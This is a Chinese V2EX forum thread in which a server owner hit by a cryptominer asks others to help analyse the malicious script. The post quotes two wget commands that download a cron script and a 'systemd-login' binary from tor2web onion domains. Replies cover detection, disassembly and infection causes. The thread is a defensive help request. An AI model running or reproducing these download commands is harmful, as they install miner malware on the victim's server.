V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
Distributions
Ubuntu
Fedora
CentOS
中文资源站
网易开源镜像站
wangking
V2EX  ›  Linux

服务器被挖矿,麻烦帮我看看脚本

  •  
  •   wangking · 2019-07-15 15:03:20 +08:00 · 5926 次点击
    这是一个创建于 1988 天前的主题,其中的信息可能已经有所发展或是发生改变。

    wget -t1 -T180 -qU- -O- --no-check-certificate rapid7cpfqnwxodo.tor2web.io/cron.sh

    能看懂中间是 base64 加密,开头和结尾是什么?

    第 1 条附言  ·  2019-07-15 17:15:54 +08:00
    最终找到二进制文件,不会看里面的内容。
    wget -t1 -T180 -qU- --no-check-certificate aptgetgxqs3secda.tor2web.io/systemd-login -O test
    第 2 条附言  ·  2019-07-15 17:46:28 +08:00
    由于二进制文件不好搞,现在的暂时解决办法是,把域名解析改掉
    14 条回复    2019-07-16 10:13:03 +08:00
    bumz
        1
    bumz  
       2019-07-15 15:18:50 +08:00 via iPhone
    tor2web

    隐藏的还挺好
    AllenBigBear
        2
    AllenBigBear  
       2019-07-15 15:30:00 +08:00
    萌新请教,怎么发现服务器被挖矿的哈?
    15651980765
        3
    15651980765  
       2019-07-15 15:32:08 +08:00
    @AllenBigBear = =服务商会发短信告诉你你的服务器 CPU 运行异常,长时间冲高。
    wangking
        4
    wangking  
    OP
       2019-07-15 15:42:16 +08:00
    @AllenBigBear 我们是监控报的,上来看,发现有异常进程
    wangking
        5
    wangking  
    OP
       2019-07-15 15:49:46 +08:00
    @bumz 这个开头和结尾是什么鬼,大佬了解吗
    AllenBigBear
        6
    AllenBigBear  
       2019-07-15 15:59:27 +08:00
    @15651980765 哦哦,好的,谢谢!
    shinodajmk
        7
    shinodajmk  
       2019-07-15 16:01:34 +08:00
    服务器挖矿,这收益率是很低的。CPU 扛矿。除非你是 GPU 型机子,很棒帮
    dlsflh
        8
    dlsflh  
       2019-07-15 16:19:46 +08:00 via Android
    @shinodajmk 你要不去看一下 XMR ?
    defunct9
        9
    defunct9  
       2019-07-15 17:24:08 +08:00
    s.bsst
    6!8-
    #C@>
    cp -pf /H
    tmp/.00 CE
    /lib/sys!emd !
    -log!in6r
    ; toucpxhd
    defunct9
        10
    defunct9  
       2019-07-15 17:24:54 +08:00
    这是个前置的,一旦运行估计就开始下东西。安装,运行
    wangking
        11
    wangking  
    OP
       2019-07-15 17:45:50 +08:00
    @defunct9 找了个编辑器,打开就是这一堆的东西,看不懂。,
    moonfly
        12
    moonfly  
       2019-07-15 19:47:46 +08:00 via iPhone
    二进制程序要反汇编,拖到 IDA 里看看,没加密混淆的话,应该能看出大致的程序运行逻辑,如果确定是挖矿木马,那就没啥分析的价值了!顶多学学它的自启动脚本怎么写的!

    话说服务器被挖矿,第一件事情不是应该查是如何被挂的马吗?
    nnnToTnnn
        13
    nnnToTnnn  
       2019-07-16 08:56:20 +08:00
    @moonfly 可能是破解的 xshell,或者是在非官网下载又不验证 hash 值
    wangking
        14
    wangking  
    OP
       2019-07-16 10:13:03 +08:00
    @moonfly 可能是历史遗留原因。
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   3925 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 23ms · UTC 10:22 · PVG 18:22 · LAX 02:22 · JFK 05:22
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.